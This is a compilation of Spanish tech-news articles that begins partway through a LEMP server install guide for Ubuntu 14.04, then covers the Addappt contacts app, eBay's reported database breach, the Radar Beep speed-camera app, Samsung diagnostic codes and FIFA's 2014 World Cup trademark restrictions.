Ahora tenemos que instalar el resto de herramientas del servidor LEMP. Seguiremos por Php, si bien existe la opción de instalar Python, para el desarrollo web suelen decantarse por php aunque las dos son iguales de buenas.

sudo apt-get install  php5 php5-cgi spawn-fcgi

sudo service nginx restart

Y finalmente instalamos la base de datos, podemos elegir entre MariaDB y Mysql, prácticamente son las mismas, con la diferencia que usa es comunitaria mientras que la Mysql es de una empresa. En esta caso instalamos Mysql por no tener complicaciones más adelante, pero puede valer cualquiera de las dos opciones

sudo apt-get install mysql-server mysql-client php5-mysql phpmyadmin

sudo service nginx restart

Este último paquete es el encargado de gestionar nuestra base de datos a través del navegador. Ahora ya está listo nuestro ordenador y nuestro Ubuntu 14.04 para funcionar como un servidor. Recordad que para comprobar que funciona tenemos que escribir en el navegador localhost y veremos una pantalla en la que aparece las letras Its Works! Además para ver las webs que creamos, tenemos que guardarlo en la carpeta /var/www de nuestro sistema. Ahora a disfrutad de Ubuntu Trusty y de LEMP!

El artículo Instalar LEMP en Ubuntu Trusty Tahr ha sido originalmente publicado en Ubunlog.

Pinche aquí para ver el vídeo

La mayoría de los usuarios en Android ya están acostumbrados a usar la sincronización de la cuenta de Google para tener en ella todos sus contactos sin tener que hacer nada realmente especial cuando hemos adquirido un nuevo teléfono, para que así tengamos la lista de contactos totalmente actualizada. Una de las mejores facetas que puede otorgar Google con su cuenta Gmail o mismamente algunas de las redes sociales como puede ser Facebook.

Addappt de lo que se encarga es de sincronizar privadamente vuestra información de contacto con amigos y compañeros de trabajo, funcionando más como si fuera una agenda de contactos en vez de una red social. De esta forma no se necesita “atar” todos vuestros datos a una cuenta de una red social con la mayoría de todas las entradas que hagáis en ella. Una aplicación que ya lleva más de un año en iOS, pero que hoy ha recibido una actualización mayor llegando finalmente a Android.

Para poder usar Addappt, tanto vosotros como vuestros contactos deben verificar una dirección de correo electrónico principal. Entonces todos enviarán las invitaciones para que se conecten, para que después de esto, cuando alguno quiera actualizar su propia información de contacto, los datos automáticamente cambiarán en los demás dispositivos.

La compañía guardará esta información privadamente y no será cargada a ninguno de sus servidores. Addappt también ofrece soporte para agrupar a una serie de contactos en un mismo grupo para enviar mensajes a todos de una vez. La funcionalidad es gratuita para todos y no encontraréis ningún tipo de publicidad dentro de la aplicación.

Si queréis optar a otra manera de poder tener sincronizada vuestra información de contacto tanto como la de vuestros amigos, familiares o compañeros, desde el widget a continuación encontraréis el acceso directo a la aplicación en la Play Store.

addappt

Precio: Gratis

El artículo Addappt llega a android para sincronizar la libreta de direcciones de vuestros contactos ha sido originalmente publicado en Androidsis.

eBay ha reportado que hace un par de meses Hackers lograron violar su seguridad y robaron una base de datos con información acerca de sus usuarios

eBay ha salido a anunciar el día de hoy que fue víctima de un ataque por parte de hackers que lograron robar una base de datos con los nombres de sus usuarios, contraseñas, correos electrónicos, direcciones, números telefónicos y fechas de nacimiento. La compañía aclaro que las contraseñas están encriptadas pero no puede asegurar que los hackers no serán capaces de desencriptarlas y obtener las contraseñas. Como medida de protección, la compañía ha decidido resetear las contraseñas de todos sus usuarios registrados y les pide a sus usuarios que cambien su contraseña.

eBay no menciono cuantos de sus 148 millones de usuarios se vieron afectados por el robo de la base de datos pero una representante de la compañía menciono que el ataque afecta a “un gran número de cuentas”

PayPal, una subsidiaria de eBay, menciono que sus sistemas no se vieron afectados por los hackers ya que la información de los usuarios de PayPal se almacena en servidores diferentes.

Se descubrió que para tener acceso a la base de datos de eBay, los hackers lograron obtener la información de acceso de algunos empleados de la compañía.

A pesar de que los hackers robaron la base de datos a finales del mes de Febrero o principios de Marzo, no fue hasta hace dos semanas que descubrieron que algunas credenciales de empleados de eBay habían sido robadas por lo que iniciaron una investigación a fondo de sus sistemas y fue así como descubrieron la gravedad del ataque.

La buena noticia para los usuarios de eBay es que las contraseñas estaban encriptadas por lo que los criminales tendrán que trabajar mucho para tener acceso a la información. Además, las contraseñas de eBay están por arriba del promedio en cuanto a su complejidad se refiera así que será aún más difícil para los hackers poder desencriptarlas.

Pero aunque nunca hayan podido tener acceso a las contraseñas, los hackers todavía tienen acceso a los nombres, direcciones, correos y teléfonos de los usuarios así que debes estar muy atento si es que recibes llamadas sospechosas o promociones en nombre de eBay.

Por último, hasta el momento eBay no ha detectado un incremento en las actividades fraudulentas en eBay.

Antes de salir de vacaciones hay que hacer chequeos de todo tipo y, por supuesto, instalar un avisador de radares en carretera para Android es una de esas pequeñas tareas que nos puede ahorrar algunos problemas. Radar Beep es la aplicación que buscas, un avisador de radares realmente completo y perfectamente legal que podrás llevar siempre avisándote de cuando debes moderar tu velocidad y conducción.

Los radares de carretera están ubicados en lugares públicos, es decir, existe un listado que se puede consultar por parte de cualquier ciudadano y esto es lo que hace Radar Beep, mantiene su base de datos de radares actualizada en todo momento para que sepamos dónde están activos los radares y dónde suele ubicarse los radares móviles para avisarnos. Recibiremos una señal antes de acercarnos a radares fijos móviles, tramos peligrosos, semáforos, avisos de peligros en la carretera, puntos negros y controles habituales de policía, además nos avisa de la distancia que nos falta hasta llegar al radar así como la velocidad a la que circulamos para que podamos corregirla si es necesario. Todo esto gracias al uso del GPS integrado en los móviles y tablets Android. Una de las funciones que podemos configurar son los avisos graduales que nos recuerdan la distancia hasta los radares teniendo en cuenta nuestra velocidad, evitando cambios bruscos en nuestra marcha que pueden resultar peligrosos.

Mientras utilicemos Radar Beep podemos ver en nuestra pantalla un visor similar al GPS en el que se nos informará de la velocidad de la vía por la que estamos circulando así como de la dirección y velocidad de nuestro coche en la ubicación exacta en la que nos encontramos y los radares más cercanos a nosotros.

Por otra parte, en sucesivas actualizaciones Radar Beep ha mejorado su integración en el coche de forma exponencial, ahora puede activarse al detectar el bluetooth del coche y próximamente hará lo mismo con las etiquetas NFC y los detectores NFC que integran muchos smartphones Android. Esto es genial porque sólo tendremos que acordarnos de instalar Radar Beep en nuestro smartphone Android, configurarlo y olvidarnos hasta que nos avise.

Además, la aplicación está disponible en multitud de idiomas como Alemán, Árabe, Catalán, Chino, Coreano, Español, Francés, Hindi, Inglés, Italiano, Japonés, Polaco, Portugués, Rumano, Ruso, o Turco y en casi todas ellas está disponible así mismo la voz que nos avisa de los radares. Por supuesto, España es uno de sus puntos fuertes pero Radar Beep funciona en múltiples países, algo genial si queremos viajar por Europa, aunque tendremos que descargar la base de datos de cada país que queramos visitar.

Si vas a viajar un buen GPS y una app como Radar Beep son imprescindibles para no alcanzar nunca velocidades superiores a las permitidas y mantener siempre la seguridad en la carretera, asegurándonos de cumplir escrupulosamente las normas de circulación. Gracias a Radar Beep sabremos en todo momento la velocidad máxima de cada vía y la situación de los radares y controles directamente en nuestro Android, una ayuda para asegurarnos que las vacaciones no nos cuestan una multa.

Radar Beep en Descargar Android - Las Mejores Apps Para Android Gratis.

Nuestros teléfonos Samsung Galaxy son pequeños ordenadores y con tantos cientos de piezas, chips y componentes internos es normal que de vez en cuando alguno tenga fallos y provoque errores en los terminales, estas situaciones son minimizables (cuanta más calidad y menos fabricación estilo móvil chino barato, mejor) sin embargo, es imposible acabar con ellos. Ni siquiera con los mejores controles de calidad empresas como Samsung están libres por eso los técnicos necesitan alguna forma de verificar el estado de algunos componentes y funciones. Esto se hace mediante los códigos secretos de Samsung.

Los códigos secretos de Samsung Galaxy se aplican al terminal para que nos muestre en pantalla una serie de datos verificando así el estado de cada componente o función y para ello hay que marcarlos como si de una llamada se tratara, son código simples pero muy potentes e importantes y en algunos casos su uso puede ser catastrófico si no sabemos qué estamos haciendo. Por eso Descargar Android no se hace responsable de lo que le pueda ocurrir a tu móvil.

Los códigos de Samsung Galaxy a los que hemos tenido acceso se han publicado en Reddit por parte de un usuario que ha sido capaz de obtenerlos, recordemos que están pensados para su uso por parte de técnicos, no suelen ser códigos públicos, y los puedes ver aquí junto a una descripción de para qué sirven:

Gracias a estos códigos secretos de Samsung Galaxy podremos obtener muchísima información detallada para saber el estado de muchos de los componentes de nuestro teléfono.

Si conoces más códigos no olvides dejarlos en los comentarios junto con una descripción de para qué los podemos utilizar en nuestros smartphones Android.

Los códigos secretos de Samsung más importantes en Descargar Android - Las Mejores Apps Para Android Gratis.

¿Qué tienen en común "Brasil 2014", "Mundial de Fútbol" y "FIFA World Cup"? Todos estos términos forman parte de una lista de nombres que la FIFA ha registrado y cuyo uso comercial está sujeto al permiso del máximo organismo internacional del fútbol. ¿En qué se traduce esto? En que si tienes una tienda online, no puedes utilizar ni el logo ni esos eslóganes en promociones. En que, además, si alguien de tu familia tiene un bar, no puede usar el póster ni otros elementos para decorar. ¿Y si quieres hacer una web sobre el evento? Si vas a darle un uso comercial, cuidado con los materiales que vas a utilizar.

Ese privilegio sólo está reservado para los patrocinadores oficiales. "FIFA no sería capaz de organizar el torneo sin la importante colaboración de sus afiliados comerciales" y, según explican, por ello defienden un uso tan restringido de todas las marcas asociadas al Mundial de Fútbol. Sólo sus colaboradores, previo pago, pueden valirse de ellas. En un documento oficial explican en detalle qué se puede hacer y qué no, como pasamos a repasar a continuación:

Las palabras oficiales "prohibidas"

• 2014 FIFA World Cup Brazil
• 2014 FIFA World Cup
• FIFA World Cup
• FIFA
• World Cup
• 2014 World Cup
• World Cup 2014
• Brazil 2014
• 2014 Brazil
• Football World Cup
• Soccer World Cup
• Copa 2014
• Copa do Mundo
• Mundial 2014
• Mundial de Futebol Brasil 2014
• Copa do Mundo 2014
• Rio 2014 (junto al resto de sedes)

Como advierte la FIFA, esta lista no se trata de un listado completo de todas las palabras que han registrado y cuyo uso está restringido. En función del país en el que nos encontremos también existirán otras frases protegidas. Por ejemplo, "Mundial de fútbol" en España y cualquiera de las traducciones de las anteriormente mencionadas.

Otros materiales que no se pueden usar en publicidad

• El emblema oficial
• La mascota oficial
• El slogal oficial ("All in one rhythm")
• Póster oficial
• Imágenes del trofeo
• Logo de la FIFA

Lo que no se puede hacer

• Realizar promociones o anuncios de cualquier tipo que utilicen cualquiera de los materiales especificados anteriormente.
• Sortear entradas para los partidos a modo de concurso.
• Subastar entradas online.
• Imprimir un calendario de partidos con fines comerciales.
• Utilizar una marca registrada como parte de un nombre de un negocio (por ej. Brasil 2014 Hotel Guide)
• Utilizar una marca registrada en merchandising (por ej. una camiseta con Brasil y el año 2014)
• Decoraciones en bares y restaurantes con el logo del Mundial, de la FIFA o cualquier marca registrada.
• Dominios comerciales que llevan una marca antes del nombre del dominio (por ej. www.worldcup.travel.company.com)
• Usar el logo cerca de otro logo distinto en una web de Internet.
• Usar los materiales protegidos (por ej. el logo de la FIFA) con enlace a la web oficial.
• Utilizar las marcas registradas en SMS, MMS u otros servicios móviles.
• Utilizar las palabras protegidas y los gráficos para aplicaciones móviles.
• Utilizar los materiales protegidos en las redes sociales.
• Organizar un visionado público patrocinado por una marca.

Esta camiseta estaría infringiendo los derechos de autor de la FIFA por usar "Brasil 2014"

Lo que se puede hacer

• Realizar promociones o anuncios con términos genéricos que no produzcan una "asociación no autorizada" a la FIFA.
• Uso de los materiales oficiales para fines periodísticos.
• Imprimir un calendario de partidos genérico y sin fines comerciales.
• Utilizar un término genérico relacionado con el fútbol o con Brasil como parte de un nombre de un negocio.
• Utilizar términos generales para crear merchandising (por ej. una camiseta con Brasil y su bandera).
• Decoraciones en bares y restaurantes con material generalista asociado al fútbol (banderas de Brasil, balones, etc.)
• Dominios comerciales que llevan una marca después del nombre del dominio (por ej. www.travel-company.com/worldcuptravelinfo.htm)

Las marcas que quieran aprovechar el Mundial, obligadas a buscar alternativas

Se conoce como "ambush marketing" o "marketing parasitario" a las acciones en las que un determinado producto se asocia a un evento sin pagar por ser uno de sus patrocinadores y así poder aprovechar su tirón.

¿Cuándo termina el uso personal y comienza el comercial?

Desde Genbeta hemos hablado con el responsable de las redes sociales de una compañía multinacional. Tanto a él como al resto de su departamento, la marca les instó a seguir el manual de la FIFA al dedillo. ¿Qué significa esto? Que no sólo no pueden organizar sorteos ni promociones (algo más que común en estos casos), sino que pueden hacer ninguna mención al "Mundial" en sí. O usan generalidades como "fútbol" o similares, o directamente no podrán referirse al evento.

La FIFA quiere evitar el "ambush marketing" o "marketing parasitario" (las acciones en las que un determinado producto se asocia a un evento sin pagar por ser uno de sus patrocinadores y así poder aprovechar su tirón) aunque en ocasiones parezcan llegar demasiado lejos. En 2010, por ejemplo, denunciaron a una aerolínea sudafricana de bajo coste por usar el lema "Aerolínea no oficial del Ya-Sabes-Qué", al mismo tiempo que incluían una fotografía de un estadio. Tan genéricos quisieron ser que para la FIFA se veía claramente la asociación con su evento.

La gran pregunta aquí es cuándo termina el uso personal para pasar al comercial. Está claro que si alguien lleva las redes sociales de una marca se trata de un fin comercial, o incluso en los anuncios que acabamos de mencionar, pero en otras situaciones la línea no está tan clara. ¿Si alguien twittea en directo los partidos por Twitter e introduce algunos tweets con publicidad? ¿Y si alguien posee una página web con publicidad, se considera uso comercial? ¿Llegará el momento en el que prohibirán a la gente utilizar estos términos en sus páginas, blogs y redes sociales sin pagar por ello?

Imagen | José Roitberg
Enlace | Documento oficial de la FIFA

-
La noticia Prohibido decir "Mundial de fútbol" fue publicada originalmente en Genbeta por María González.